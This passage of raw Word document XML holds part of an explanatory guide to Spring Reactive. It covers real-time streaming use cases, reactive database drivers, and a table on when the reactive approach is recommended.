    <w:p w14:paraId="70084AFE" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5. Streaming &amp; Real-time Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0931E298" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Ideal for </w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>live data</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chat apps</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stock tickers</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IoT</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CE9F7C" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WebSockets</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Server-Sent Events (SSE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RSocket</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C92FB6" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00000000" w:rsidP="00260A3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814A1B6">
          <v:rect id="_x0000_i2201" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3846E3" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6. Reactive Databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D045047" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Compatible with </w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>R2DBC</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Mongo Reactive</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cassandra Reactive</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69887727" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00000000" w:rsidP="00260A3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A8CC03F">
          <v:rect id="_x0000_i2202" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="334FF852" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> When to Prefer Spring Reactiv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91"/>
        <w:gridCol w:w="2284"/>
      </w:tblGrid>
      <w:tr w:rsidR="00260A37" w:rsidRPr="00260A37" w14:paraId="2A8FBB42" w14:textId="77777777" w:rsidTr="00163F3B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DF643DF" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00260A37">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B9692F0" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00260A37">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Reactive Recommended</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260A37" w:rsidRPr="00260A37" w14:paraId="727A24C3" w14:textId="77777777" w:rsidTr="00163F3B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="670FA40C" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00260A37">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Real-time streaming (stocks, chat)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E154EBA" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00260A37">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="00260A37">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260A37" w:rsidRPr="00260A37" w14:paraId="3A1CBA50" w14:textId="77777777" w:rsidTr="00163F3B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52E13BF5" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00260A37">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>REST APIs with high concurrent users</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25C60E3B" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00260A37">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
            <w:r w:rsidRPr="00260A37">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260A37" w:rsidRPr="00260A37" w14:paraId="408B9CE4" w14:textId="77777777" w:rsidTr="00163F3B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B245079" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00260A37">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Traditional CRUD-based admin panels</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B3021C0" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00260A37">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
            <w:r w:rsidRPr="00260A37">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Not needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00260A37" w:rsidRPr="00260A37" w14:paraId="5CE3835C" w14:textId="77777777" w:rsidTr="00163F3B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="470E9E03" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00260A37">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Applications where thread blocking is okay</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16D0A1FF" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00260A37">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>❌</w:t>
            </w:r>
            <w:r w:rsidRPr="00260A37">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Not needed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F334474" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00000000" w:rsidP="00260A3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4B817C4">
          <v:rect id="_x0000_i2203" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD5DC6D" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003831D8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In short:</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use Spring Reactive when you want to build non-blocking, high-throughput apps that can scale efficiently under heavy traffic</w:t>
      </w:r>
      <w:r w:rsidRPr="00260A37">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0376039D" w14:textId="77777777" w:rsidR="00163F3B" w:rsidRPr="00260A37" w:rsidRDefault="00163F3B" w:rsidP="00260A37">
      <w:pPr>
        <w:jc w:val="both"/>
